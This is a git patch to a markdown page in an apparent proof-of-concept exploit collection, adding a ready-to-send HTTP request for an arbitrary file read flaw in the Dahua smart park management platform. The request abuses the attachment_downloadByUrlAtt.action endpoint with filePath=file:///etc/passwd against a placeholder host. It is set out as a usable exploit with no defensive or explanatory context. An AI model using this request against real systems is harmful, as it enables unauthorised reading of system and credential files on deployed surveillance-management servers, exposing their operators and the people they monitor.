From 3e3fb77cf45692b80676918a96281c0dafbb1b76 Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Fri, 2 Feb 2024 16:12:52 +0800 Subject: [PATCH] =?UTF-8?q?Update=20=E5=A4=A7=E5=8D=8E=E6=99=BA=E6=85=A7?= =?UTF-8?q?=E5=9B=AD=E5=8C=BA=E7=AE=A1=E7=90=86=E5=B9=B3=E5=8F=B0=E4=BB=BB?= =?UTF-8?q?=E6=84=8F=E6=96=87=E4=BB=B6=E8=AF=BB=E5=8F=96.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- 大华智慧园区管理平台任意文件读取.md | 13 ++++++++++++- 1 file changed, 12 insertions(+), 1 deletion(-) diff --git a/大华智慧园区管理平台任意文件读取.md b/大华智慧园区管理平台任意文件读取.md index 177a470..33dc336 100644 --- a/大华智慧园区管理平台任意文件读取.md +++ b/大华智慧园区管理平台任意文件读取.md @@ -1,9 +1,20 @@ ## 大华智慧园区管理平台任意文件读取 +大华 城市安防监控系统平台管理 任意文件下载漏洞 + +![980ef223e974cc83ec550ebf4e831be0](https://github.com/wy876/POC/assets/139549762/c288a9eb-da04-477d-9374-f2fbf4197e25) + ## poc ``` -/portal/itc/attachment_downloadByUrlAtt.action?filePath=file:/ +GET /portal/attachment_downloadByUrlAtt.action?filePath=file:///etc/passwd HTTP/1.1 +Host: ip:port +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Connection: close ``` ![image](https://github.com/wy876/POC/assets/139549762/63bb42ac-8bd8-401e-a61b-120e7a910d5c)